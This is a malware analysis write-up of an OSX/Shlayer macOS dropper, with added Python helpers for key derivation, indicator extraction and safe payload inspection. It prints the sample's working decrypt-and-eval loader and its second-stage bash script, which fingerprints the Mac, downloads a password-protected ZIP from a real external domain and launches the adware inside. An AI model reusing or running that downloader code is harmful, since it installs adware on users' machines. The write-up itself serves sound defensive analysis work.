OSX/Shlayer

SHA256sums:

  • df70a13713836475de5361f8ec048823e15ebdefd15511c597c5e8d62aac26a1 innmvlldvhukbgzruvdq

Analysis

The sample came from Putlocker's ads (don't ask), served from the domain tucam.pw. I found some other resources about it but wanted to play with this one a bit myself. You can get a sample from Objective-See's malware repo.

$ spctl --assess -vv Brooklyn\ Nine-Nine.dmg 
Brooklyn Nine-Nine.dmg: rejected
source=no usable signature

The DMG volume contains an app called Installer.app.

$ plutil -p Info.plist 
{
  "CFBundleExecutable" => "innmvlldvhukbgzruvdq"
  "CFBundleIconFile" => "app4243.icns"
  "CFBundleIdentifier" => "com.innmvlldvhukbgzruvdq"
  "CFBundleInfoDictionaryVersion" => "6.0"
  "CFBundleName" => "Installer"
  "CFBundlePackageType" => "APPL"
  "CFBundleShortVersionString" => "1.0"
  "CFBundleSupportedPlatforms" => [
    0 => "MacOSX"
  ]
  "CFBundleVersion" => "2623411592"
  "LSMinimumSystemVersion" => "10.9"
  "NSHumanReadableCopyright" => "Copyright © 2017 All rights reserved."
  "NSPrincipalClass" => "NSApplication"
}

Turns out it is OSX/Shlayer (18/58 detections on VirusTotal at the time). The executable inside MacOS/ is a bash script:

$ file innmvlldvhukbgzruvdq 
innmvlldvhukbgzruvdq: Bourne-Again shell script text executable, ASCII text

#!/bin/bash
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:2623411592 <"$fileDir"/Resources/enc)"
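The openssl call above does not take a raw key: with -pass pass:... and -nosalt it derives the AES key and IV from the password alone using OpenSSL's EVP_BytesToKey. The following is an added example (my own code, not part of the sample or of the original notes) that re-implements that derivation with only the standard library, so the raw key and IV can be recovered for use in other tools. The password is the one from the loader; the function and variable names are my own, and the md parameter exists because LibreSSL (macOS's /usr/bin/openssl) hashes with MD5 while OpenSSL 1.1.0 and later default to SHA-256.

```python
import hashlib

# Re-implementation of OpenSSL's EVP_BytesToKey as used by `openssl enc`
# (added example, not part of the Shlayer loader). With -nosalt the key
# and IV come from the password alone: D1 = H(pw), Di = H(D(i-1) || pw),
# and key || iv is the concatenation of the Di, truncated to the needed length.
def evp_bytes_to_key(password, key_len, iv_len, salt=b"", md="md5"):
    derived = b""
    block = b""
    while len(derived) < key_len + iv_len:
        block = hashlib.new(md, block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


# The password the loader passes with -pass pass:..., which is also the
# CFBundleVersion value in Info.plist.
SHLAYER_PASS = b"2623411592"


def loader_key_iv(md="md5"):
    """Hex key/IV that `openssl enc -aes-256-cbc -nosalt -pass pass:2623411592`
    derives when the tool's default digest is `md` (AES-256 key = 32 bytes,
    CBC IV = 16 bytes)."""
    key, iv = evp_bytes_to_key(SHLAYER_PASS, 32, 16, md=md)
    return key.hex(), iv.hex()


if __name__ == "__main__":
    # LibreSSL (macOS) derives with MD5; OpenSSL >= 1.1.0 uses SHA-256 unless
    # told -md md5, so the same command line yields different keys on the two.
    for digest in ("md5", "sha256"):
        k, iv = loader_key_iv(digest)
        print(f"{digest}: key={k} iv={iv}")
```

The md5 pair is what the sample's own loader uses on a stock Mac; if a decryption attempt on Linux produces garbage, the sha256 pair is the reason, and -md md5 on the openssl command line fixes it.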

It decrypts ../Resources/enc, a base64-encoded AES-256-CBC blob, and evals the output. The password 2623411592 is the CFBundleVersion from Info.plist, and with -nosalt the key and IV are derived from the password alone. To extract the second stage without running it, drop the eval and redirect the openssl output to a file. One caveat: macOS's /usr/bin/openssl is LibreSSL, which derives the key with MD5, while OpenSSL 1.1.0 and later default to SHA-256, so on Linux add -md md5 to the command or the decryption will fail. The decrypted content:

#!/bin/bash 

ENC_PASS="2623411592"
APP_DOMAIN="www.negeg.space"
APP_ROUTE="download/dlst"
unzip_password="295114326226234115923456789"

os_version="$(sw_vers -productVersion)" 
session_guid="$(uuidgen)" 
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')" 

url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path} 
app_dir="$(mktemp -d /tmp/XXXXXXXX)/" 
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1 
rm -f ${tmp_path} 
file_name="$(grep -m1 -v "*.app" <(ls -1 "${app_dir}"))" 
volume_name="$(echo -n "${PWD}" | sed -E -n 's@^(/Volumes/[^/]+)/.*@\1@p')" 
volume_name="${volume_name// /%20}" 
chmod +x "${app_dir}${file_name}/Contents/MacOS"/* 
open -a "${app_dir}${file_name}" --args "s" "${session_guid}" "${volume_name}"

This downloads a password-protected ZIP from www.negeg.space, tagged with the machine's IOPlatformUUID, a session GUID, the OS version and the stage-1 password, then launches whatever it unpacked with the session GUID and the original DMG volume path as arguments. Note that grep -m1 -v "*.app" is effectively a no-op (a leading * in a basic regex is a literal), so file_name is simply the first entry in the extraction directory. Block the domain; the IPs below are Akamai edge nodes shared with other customers, so don't block those:

$ dig www.negeg.space +short
www.negeg.space.edgesuite.net.
a74.dscg1.akamai.net.
186.179.74.215
186.179.74.201
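Shlayer variants keep the same second-stage skeleton and only swap the domain, route and passwords, so the values worth extracting are the ones the curl and unzip lines consume. The following is an added example (my own code, not from the sample or the original notes) that pulls those indicators out of a decrypted second stage by resolving the ${VAR} references in the script instead of hard-coding variable names. The embedded script is the one recovered above, trimmed to the relevant lines; the function names and the output keys are my own.

```python
import re

# Constructed input: the decrypted second stage recovered above, trimmed to the
# lines that matter (added example; the constants are those on the page).
STAGE2 = r'''#!/bin/bash
ENC_PASS="2623411592"
APP_DOMAIN="www.negeg.space"
APP_ROUTE="download/dlst"
unzip_password="295114326226234115923456789"
os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
url="http://${APP_DOMAIN}/${APP_ROUTE}?mid=${machine_id}&s=${session_guid}&o=${os_version}&p=${ENC_PASS}"
curl -f0L "${url}" >/dev/null 2>&1 >> ${tmp_path}
unzip -P "${unzip_password}" "${tmp_path}" -d "${app_dir}" > /dev/null 2>&1
'''

# NAME="literal" assignments on a line of their own.
ASSIGN = re.compile(r'^\s*([A-Za-z_][A-Za-z0-9_]*)="([^"]*)"\s*$', re.M)
# ${VAR} references inside a double-quoted value.
REF = re.compile(r'\$\{([A-Za-z_][A-Za-z0-9_]*)\}')
# Which variable feeds `curl <flags> "${...}"` and `unzip -P "${...}"`.
CURL_URL = re.compile(r'curl\s+\S+\s+"?\$\{?(\w+)\}?"?')
UNZIP_P = re.compile(r'unzip\s+-P\s+"?\$\{?(\w+)\}?"?')


def parse_assignments(script):
    """Literal string assignments, in script order. Command substitutions
    ($(...)) carry no static value and are deliberately dropped."""
    return {m.group(1): m.group(2) for m in ASSIGN.finditer(script)
            if not m.group(2).startswith("$(")}


def expand(template, env):
    """Expand ${VAR} where a literal value is known; runtime-only values
    such as ${machine_id} stay as placeholders."""
    return REF.sub(lambda m: env.get(m.group(1), m.group(0)), template)


def extract_iocs(script):
    env = parse_assignments(script)
    out = {"c2_domain": None, "download_url": None, "zip_password": None}
    m = CURL_URL.search(script)
    if m and m.group(1) in env:
        out["download_url"] = expand(env[m.group(1)], env)
        host = re.match(r'https?://([^/?#]+)', out["download_url"])
        out["c2_domain"] = host.group(1) if host else None
    m = UNZIP_P.search(script)
    if m:
        out["zip_password"] = env.get(m.group(1))
    return out


if __name__ == "__main__":
    for key, value in extract_iocs(STAGE2).items():
        print(f"{key}: {value}")
```

The download_url it returns keeps ${machine_id}, ${session_guid} and ${os_version} as placeholders, which is exactly the shape you want for a proxy or IDS signature: the path and the p= parameter are fixed per variant, the rest changes per victim.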

The content of the ZIP, which is password protected:

$ curl -Lv "http://www.negeg.space/download/dlst?mid=XXX&s=XXX&o=10.13.5&p=2623411592" > shlayer.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying 186.179.74.201...
* TCP_NODELAY set
* Connected to www.negeg.space (186.179.74.201) port 80 (#0)
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0> GET /download/dlst?mid=XXX&s=XXX&o=10.13.5&p=2623411592 HTTP/1.1
> Host: www.negeg.space
> User-Agent: curl/7.54.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: nginx/1.10.3 (Ubuntu)
< Content-Type: application/octet-stream
< Content-Length: 71651
< Content-Disposition: attachment; filename="output_zip_file.zip"
< Date: Thu, 19 Jul 2018 16:40:05 GMT
< Connection: keep-alive
< 
{ [1809 bytes data]
100 71651  100 71651    0     0  52893      0  0:00:01  0:00:01 --:--:-- 52918
* Connection #0 to host www.negeg.space left intact
$ file shlayer.zip 
shlayer.zip: Zip archive data, at least v1.0 to extract
$ unzip -t shlayer.zip 
Archive:  shlayer.zip
    testing: Installer.app/           OK
    testing: Installer.app/Contents/   OK
    testing: Installer.app/Contents/Resources/   OK
    testing: Installer.app/Contents/Resources/Base.lproj/   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/   OK
[shlayer.zip] Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib password: 
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/XfG-lQ-9wD-view-m2S-Jp-Qdl.nib   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/MainMenu.nib   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/Info.plist   OK
    testing: Installer.app/Contents/Resources/Base.lproj/Main.storyboardc/NSWindowController-B8D-0N-5wS.nib   OK
    testing: Installer.app/Contents/Info.plist   OK
    testing: Installer.app/Contents/MacOS/   OK
    testing: Installer.app/Contents/MacOS/Installer   OK
    testing: Installer.app/Contents/PkgInfo   OK
    testing: Installer.app/Contents/_CodeSignature/   OK
    testing: Installer.app/Contents/_CodeSignature/CodeResources   OK
No errors detected in compressed data of shlayer.zip.
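Rather than unzipping the payload onto a live system, it is safer to inspect it in memory: list the bundle, find the executables by their Mach-O magic, and work out which entry the second stage would have handed to open -a. The following is an added example (my own code, not from the sample or the original notes) that does this with the standard library. The archive it builds is a constructed stand-in for the real payload, with a fake Mach-O header, and it is not password-protected because zipfile can read ZipCrypto archives but cannot write them; on the real ZIP, pass the password from the second stage.

```python
import io
import struct
import zipfile

# Mach-O header magics in both byte orders: 32-bit, 64-bit and universal (fat).
MACHO_MAGICS = {
    b"\xfe\xed\xfa\xce", b"\xce\xfa\xed\xfe",
    b"\xfe\xed\xfa\xcf", b"\xcf\xfa\xed\xfe",
    b"\xca\xfe\xba\xbe", b"\xbe\xba\xfe\xca",
}


def inspect_payload(zip_bytes, password=None):
    """Inspect an app-bundle payload ZIP without extracting it to disk.
    `password` is passed through for ZipCrypto archives like the real sample."""
    pwd = password.encode() if isinstance(password, str) else password
    tops, bundles, machos = [], [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            top = info.filename.split("/", 1)[0]
            if top not in tops:
                tops.append(top)
            if top.endswith(".app") and top not in bundles:
                bundles.append(top)
            if info.is_dir():
                continue
            with zf.open(info, pwd=pwd) as fh:
                magic = fh.read(4)
            if magic in MACHO_MAGICS:
                machos.append(info.filename)
    return {
        "bundles": bundles,
        "macho": machos,
        # The second stage takes the first `ls -1` entry of the extraction
        # directory, i.e. the first top-level name in sort order.
        "launched": sorted(tops)[0] if tops else None,
    }


def build_sample():
    """Constructed stand-in for the downloaded ZIP (added example; the real one
    is ZipCrypto-protected, which zipfile cannot write)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Installer.app/", b"")
        zf.writestr("Installer.app/Contents/Info.plist", b"<plist/>")
        zf.writestr("Installer.app/Contents/PkgInfo", b"APPL????")
        # MH_MAGIC_64 (little-endian) followed by CPU_TYPE_X86_64, then padding;
        # enough to look like the start of a 64-bit Mach-O header.
        zf.writestr("Installer.app/Contents/MacOS/Installer",
                    b"\xcf\xfa\xed\xfe" + struct.pack("<I", 0x01000007) + b"\0" * 24)
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_payload(build_sample()))
```

Because the check is on content rather than on the MacOS/ directory name, it also catches a Mach-O dropped under Resources/ or a helper tool hidden elsewhere in the bundle, which the unzip -t listing alone would not reveal.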

The ZIP holds an Installer app with a real x86-64 Mach-O binary. A build path embedded in the binary suggests it was built by batman himself, and it is signed with a Developer ID certificate issued to Alan Winder (a valid Developer ID signature gets past Gatekeeper but says nothing about intent, and Apple can revoke the certificate):

131747        0x202A3         Unix path: /Users/batman/Documents/smart-install/New_Installer/ppios/Installer_webview/Installer_webview/
...
$ codesign -dvvv Installer.app
Executable=/private/tmp/Installer.app/Contents/MacOS/Installer
Identifier=com.Play
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=1512 flags=0x0(none) hashes=40+5 location=embedded
Hash type=sha256 size=32
CandidateCDHash sha1=95894af840fc42256da3582dfc5ab21127b44682
CandidateCDHash sha256=fb9efd8582c01bb63ab3b7c4e861efae347c21ea
Hash choices=sha1,sha256
CDHash=fb9efd8582c01bb63ab3b7c4e861efae347c21ea
Signature size=4695
Authority=Developer ID Application: Alan Winder (RB35AD84K3)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Signed Time=17 Jul 2018, 04:10:16
Info.plist entries=24
TeamIdentifier=RB35AD84K3
Sealed Resources version=2 rules=13 files=4
Internal requirements count=1 size=200
$ shasum -a256 Installer.app/Contents/MacOS/Installer 
c65e995d436df059dafb7c6dc62af97a04477da28c3898c95278b7610adc7c78  Installer.app/Contents/MacOS/Installer

The little fella seems to be OSX/Genieo-DG (Adware).

Note: the DMG is downloaded automatically by the ad, so an inexperienced or confused user who finds an unexpected file in ~/Downloads may well open it.